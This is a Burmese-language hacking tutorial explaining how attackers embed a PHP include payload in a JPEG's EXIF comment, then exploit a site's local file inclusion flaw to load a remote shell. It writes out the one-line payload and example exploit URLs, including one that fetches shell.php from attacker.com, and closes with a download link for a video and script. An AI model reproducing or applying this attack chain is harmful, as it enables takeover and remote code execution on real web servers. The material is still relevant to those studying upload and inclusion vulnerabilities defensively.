EXIF Data

Author : Cyberhunter
EXIF ဆိုတာကေတာ့ Exchangable File Format ကိုေခၚတာပါ။ သူဟာ digital camera ေတြမွာသုံးတဲ့ file format တစ္ခုျဖစ္ပါတယ္ သူ႕ကို Japan Electronic Industry Development Association (JEIDA) ကေန create လုပ္ခဲ့တာပါ။
သူ႕ကို JPEG, TIFF Rev, RIFF WAVE file format ေတြမွာ meta data tag ေတြနဲ႕သုံးၾကပါတယ္
ဟုတ္ျပီ အဲဒီ EXIF Data ေတြကို Attacker (Hacker) ေတြဟာသူတို႕ရဲ့ Hacking ေတြမွာဘယ္လိုအသုံးခ်ၾကလဲ။ ဘာေၾကာင့္ Attacker (Hacker) ေတြဟာသူတို႕ရဲ့ Hacking ေတြမွာ အသုံးခ်ႏိုင္တာလဲဆိုေတာ့ ႐ိုး႐ိုးသာမန္ image ေတြမွာ Attacker (Hacker) ေတြဟာ PHP coding ေတြကို ထည့္သြင္းႏိုင္လို႕ပဲျဖစ္ပါတယ္။ ဒါေပမဲ့သတိျပဳရမွာတစ္ခုကေတာ့ အဲဒီ image ကို browse လုပ္လိုက္ျပီး ၾကည့္လိုက္ေပမဲ့ Attacker ကထည့္သြင္းထားတဲ့ PHP code ကို process လုပ္မွာမဟုတ္ပါဘူး။
ဟုတ္ျပီအဲဒါဆို EXIF Data ေတြဟာ Attacker (Hacker) ေတြကို သူတို႕ရဲ့ Hacking ေတြျပဳလုပ္ရာမွာဘယ္လိုအေထာက္အကူေပးသလဲဆိုတာၾကည့္လိုက ္ၾကရေအာင္။
ဥပမာ Attacker (Hacker) ဟာ LFI vulnerable ျဖစ္တဲ့ site တစ္ခုကိုေတြ႕လိုက္တယ္ဆိုပါစို႕။ ဒါဆိုသူ႕အေနနဲ႕ Server ေပၚမွာရွိတဲ့ File ေတြကို access လုပ္လို႕ပဲရဦးမယ္။ တကယ္လို႕မ်ားသူဟာ ဒီထပ္ပိုျပီးအေသးစိတ္သိခ်င္မယ္ file ေတြကို ဒီထပ္ပိုျပီး လြယ္လြယ္ကူကူနဲ႕ access လုပ္ခ်င္မယ္ဆိုရင္ေတာ့ သူ႕အတြက္ Shell Script တစ္ခုလိုလာပါျပီ။ အဲဒါဆိုရင္သူဟာ LFI vulnerability ကေန RFI vulnerability ျဖစ္ေအာင္က်ိဳးစားရပါေတာ့မယ္။ တကယ္လို႕မ်ား အဲဒီ site ဟာ image ေတြကို upload ေပးလုပ္တယ္ဆိုရင္ေတာ့သူ႕အတြက္ၾကိဳးစားဖို႕အခြင့္အေရး အမ်ားၾကီးရွိသြားပါျပီ။
ဒါဆိုရင္ေတာ့သူဟာ သူ႕ရဲ့ image file ထဲမွာ ေအာက္မွာျပထားတဲ့ RFI vulnerable ျဖစ္တဲ့ PHP Script ကိုထည့္သြင္းႏိုင္ပါတယ္။
<? @include($_GET['shell']); ?>
အဲဒီ PHP Script ကို image ရဲ့ comment ထဲမွာထည့္သြင္းပါလိမ့္မယ္။
ျပီးရင္ေတာ့ အဲဒီ image ကို site ရဲ့ vulnerability ကေနတဆင့္ ေခၚယူဖို႕ၾကိဳးစားပါလိမ့္မယ္။
ဥပမာ အဲဒီ site ရဲ့ vulnerable ျဖစ္တဲ့ URL String ဟာေအာက္မွာေဖာ္ျပထားတဲ့အတိုင္းပဲျဖစ္တယ္ဆိုၾကပါ စို႕။
http://site.com/index.php?page=page.php
Attacker (Hacker) upload လုပ္လိုက္တဲ့ image ဟာ images ဆိုတဲ့ path ထဲမွာ 1.jpg အေနနဲ႕ေရာက္ရွိသြားတယ္ဆိုပါစို႕။ ဒါဆို Attacker (Hacker) ကဒီလိုမ်ိဳးၾကိဳးပမ္းႏိုင္ပါတယ္။
http://site.com/index.php?page=1.jpg
ဒါေပမဲ့တကယ့္ image ကိုျမင္ရမွာမဟုတ္ပါဘူး အဲဒီေနရာမွာ image ထဲမွာထည့္သြင္းထားတဲ့ RFI vulnerability ကေနတဆင့္ Attacker (Hacker) ရဲ့ site မွာထည့္သြင္းထားတဲ့ Shell Script ကိုေခၚရမွာျဖစ္ပါတယ္။
http://site.com/index.php?page=1.jpg&shell=http%3A%2F%2Fattacker.com%2Fshell.php
ဒါဆိုရင္ေတာ့ site.com ကို Attacker ရဲ့ site က shell.php ကိုအသုံးျပဳျပီး ၾကိဳက္သလိုထိန္းခ်ဳပ္လို႕ရသြားပါျပီ
movie tutorial ၾကည့္ခ်င္သူေတြအတြက္ movie + script
http://shrta.com/files/YWFNZYV5/exif.rar